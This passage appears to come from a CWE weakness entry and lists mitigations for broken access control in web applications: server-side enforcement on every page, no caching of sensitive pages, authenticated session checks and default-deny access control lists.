  • For web applications, make sure that the access control mechanism is enforced correctly at the server side on every page. Users should not be able to access any unauthorized functionality or information by simply requesting direct access to that page.
  • One way to do this is to ensure that all pages containing sensitive information are not cached, and that all such pages restrict access to requests that are accompanied by an active and authenticated session token associated with a user who has the required permissions to access that page.
Mitigation
System Configuration Installation

Use the access control capabilities of your operating system and server environment and define your access control lists accordingly. Use a "default deny" policy when defining these ACLs.

No CAPEC attack patterns related to this CWE.